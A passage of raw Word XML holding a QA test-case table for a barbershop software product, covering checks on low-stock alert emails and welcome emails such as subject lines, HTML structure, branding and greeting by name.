            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="752A8E8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CAA434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shows amber “LOW STOCK” badge for qty&gt;0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="2AE304A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6235839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8C7BC33" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2F05A9C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LSA-14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="074EFCD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7C461A1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lists all 3 items (Fade Spray, Beard Oil, Pomade)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2863023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3 present</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="79583A7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B153EC8" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="318BC9C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LSA-15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="5AC84AD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50EC878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includes </w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>“VIEW INVENTORY” CTA button</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="1D191DD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Present</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="67999C7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CC40C49" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="49162A3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LSA-16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="725D61B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037B2B2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Plain text lists all 3 items</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="273390D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3 present</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="00489D3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72AB947" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="08184D6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LSA-17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="275E141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5F35FF5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Plain text includes “OUT OF STOCK” status text</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="3590800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038D19F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CD2F220" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1D12C5B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LSA-18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7438C18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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4065E23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uses singular “item” when only 1 item</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1FA32C7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Singular confirmed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="51EDDA0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CA12A8A" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="339F817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LSA-19</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="0936121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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="7A60B2C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delivered via Resend API</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="6AB66B0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Resend ID: </w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>886f032f</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="7333FDE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bl>
    <w:p w14:paraId="3DE9C7E0"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Subject line format:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Low stock alert — 3 items need restocking at Crown Cuts Barbershop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA5AAC0" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="711BC2D4">
          <v:rect id="_x0000_i1035" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A946171" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00B45FC6" w:rsidP="00020772">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="40"/>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="787777"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="tc-wel-welcome-email"/>
      <w:bookmarkEnd w:id="22"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="787777"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>TC-WEL — Welcome Email</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796AEFC8"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Triggered on first-ever email confirmation in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>GET /auth/callback</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Sends once only (guarded by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>welcome_sent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> user metadata flag).</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7"/>
        <w:gridCol w:w="1857"/>
        <w:gridCol w:w="1858"/>
        <w:gridCol w:w="1858"/>
        <w:gridCol w:w="1858"/>
      </w:tblGrid>
      <w:tr w:rsidR="004C5E58" w:rsidRPr="00CD0784" w14:paraId="49C81919"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single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C9A84C"/>
          </w:tcPr>
          <w:p w14:paraId="167DD3A7"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TC-ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C9A84C"/>
          </w:tcPr>
          <w:p w14:paraId="742D7B37"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Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C9A84C"/>
          </w:tcPr>
          <w:p w14:paraId="0FDCED1C"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Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C9A84C"/>
          </w:tcPr>
          <w:p w14:paraId="29811607"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Expected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C9A84C"/>
          </w:tcPr>
          <w:p w14:paraId="5836CFA0"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31F7EB9E" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="1C77A41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WEL-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="34DF795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7C3F277E"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subject</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> field is a non-empty string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="1DDAF6A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74350B1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DDD74B7" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0F16D9F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WEL-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7AB4190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6A3185B3"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html</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> field is &gt; 100 chars</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="08E3019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3964 chars</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="07C1B8D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1529EEE" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="23D34B1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WEL-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="7BF3F36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58CD14D9"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text</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> fallback field present</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="4EA5BAA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431 chars</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="46F648C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B6271E6" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="09A809D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WEL-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0E8E873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0CE5804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&lt;!DOCTYPE html&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5B77DC7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051C0E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9AA40CA" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="0AB87AC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WEL-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="624B897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06E6BF7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BARBERBOOST</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> branding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="5D4C8C3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5CAB7B6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FE55C13" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5384507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WEL-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="160F98D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6F67E92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uses </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>brand</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> gold </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>colour</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0068E7C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53903F9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B9D4920" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="7D0A3EA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WEL-07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="0D12B99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22672B7A"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&lt;div&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> tags balanced</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="6AFBBBB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3 pairs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="565C3D0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832101F" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4C0B0A7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WEL-08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5E9D801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5B491FFE"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&lt;td&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> tags balanced</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1F5D415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7 pairs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="57A0A04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9C3F914" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="43A15BE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WEL-09</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="204FF40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3650959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contains word “Welcome”</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="4C87A9C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0B89350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DCF814F" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5E373C3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WEL-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="080D326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7D52F33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does NOT contain any emoji character</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7248F9A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Confirmed clean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="749EDE9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FDF3327" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="6CA07DC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WEL-11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="640713F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E95B32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greets shop </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>owner</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> by name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="500804B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5EA9B70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2AA0B84" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="20BA2E1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WEL-12</w:t>
            </w:r>
          </w:p>
        </w:tc>
